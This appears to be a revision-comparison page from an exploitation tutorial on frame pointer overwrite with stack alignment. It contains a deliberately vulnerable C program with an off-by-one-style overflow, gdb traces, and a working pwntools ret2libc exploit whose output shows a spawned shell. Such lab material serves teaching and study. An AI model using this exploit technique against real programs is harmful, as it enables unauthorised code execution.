Versions Compared

Old Version 4

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version 5

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
titlefpo_alignment.c
//gcc -m32 -fno-stack-protector -o fpo_alignment fpo_alignment.c -ldl
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
 
void vuln(){
    char buf[50];
    printf("buf[50] address : %p\n",buf);
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    read(0, buf, 63);
}
 
void main(int argc, char *argv[]){
    if(argc<2){
        printf("argv error\n");
        exit(0);
    }
    vuln();
}

...

Code Block
titleBreakpoints
lazenca0x0@ubuntu:~/Exploit/FPO$ gdb -q ./fpo_alignment
Reading symbols from ./fpo_alignment...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x080485d3 <+0>:	lea    ecx,[esp+0x4]
   0x080485d7 <+4>:	and    esp,0xfffffff0
   0x080485da <+7>:	push   DWORD PTR [ecx-0x4]
   0x080485dd <+10>:	push   ebp
   0x080485de <+11>:	mov    ebp,esp
   0x080485e0 <+13>:	push   ecx
   0x080485e1 <+14>:	sub    esp,0x4
   0x080485e4 <+17>:	mov    eax,ecx
   0x080485e6 <+19>:	cmp    DWORD PTR [eax],0x1
   0x080485e9 <+22>:	jg     0x8048605 <main+50>
   0x080485eb <+24>:	sub    esp,0xc
   0x080485ee <+27>:	push   0x80486d4
   0x080485f3 <+32>:	call   0x8048430 <puts@plt>
   0x080485f8 <+37>:	add    esp,0x10
   0x080485fb <+40>:	sub    esp,0xc
   0x080485fe <+43>:	push   0x0
   0x08048600 <+45>:	call   0x8048440 <exit@plt>
   0x08048605 <+50>:	call   0x804857b <vuln>
   0x0804860a <+55>:	nop
   0x0804860b <+56>:	mov    ecx,DWORD PTR [ebp-0x4]
   0x0804860e <+59>:	leave  
   0x0804860f <+60>:	lea    esp,[ecx-0x4]
   0x08048612 <+63>:	ret    
End of assembler dump.
gdb-peda$ b *0x080485d3
Breakpoint 1 at 0x80485d3
gdb-peda$

...

Code Block
titleStack alignment at 16-byte boundary
gdb-peda$ r AAAA
Starting program: /home/lazenca0x0/Exploit/FPO/fpo_aligned AAAA
Breakpoint 1, 0x080485d3 in main ()
gdb-peda$ i r esp
esp            0xffffd59c	0xffffd59c
gdb-peda$ p/x 0xffffd59c + 0x4
$1 = 0xffffd5a0
gdb-peda$ ni

0x080485d7 in main ()
gdb-peda$ i r esp
esp            0xffffd59c	0xffffd59c
gdb-peda$ p/x 0xffffd59c & 0xfffffff0
$2 = 0xffffd590
gdb-peda$ ni

0x080485da in main ()
gdb-peda$ i r esp
esp            0xffffd590	0xffffd590
gdb-peda$ i r ecx
ecx            0xffffd5a0	0xffffd5a0
gdb-peda$ x/wx 0xffffd5a0 - 0x4
0xffffd59c:	0xf7e18637
gdb-peda$ x/i 0xf7e18637
   0xf7e18637 <__libc_start_main+247>:	add    esp,0x10
gdb-peda$

...

Code Block
languagepy
titleExploit.py
from pwn import *

p = process(['./fpo_aligned','AAAA'])

p.recvuntil('buf[50] address : ')
tmp = p.recv(10)
stackAddr = int(tmp,16)
stackAddr += 0x8
onebyte = int(tmp[8:11],16)
onebyte += 0x4

p.recvuntil('Printf() address : ')
libc = p.recvuntil('\n')
libc = int(libc,16)

libcBase = libc - 0x49020
sysAddr = libcBase + 0x3a940
exit = libcBase + 0x2e7b0
binsh = libcBase + 0x15902b

print "StackAddr : " + hex(stackAddr)
print "onebyte : " + hex(onebyte)
print "libc base : " + hex(libcBase)
print "system() : " +hex(sysAddr)
print "exit() : " +hex(exit)
print "binsh : " + hex(binsh)

exploit = p32(stackAddr)
exploit += p32(sysAddr)
exploit += p32(exit)
exploit += p32(binsh)
exploit += '\x90' * (62 - len(exploit))
exploit += p32(onebyte)

p.send(exploit)
p.interactive()
Code Block
titlepython Exploit.py
lazenca0x0@ubuntu:~/Exploit/FPO$ python Exploit.py 
[+] Starting local process './fpo_aligned': pid 4830
StackAddr : 0xffc98542
onebyte : 0x3e
libc base : 0xf7d8d000
system() : 0xf7dc7940
exit() : 0xf7dbb7b0
binsh : 0xf7ee602b
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

...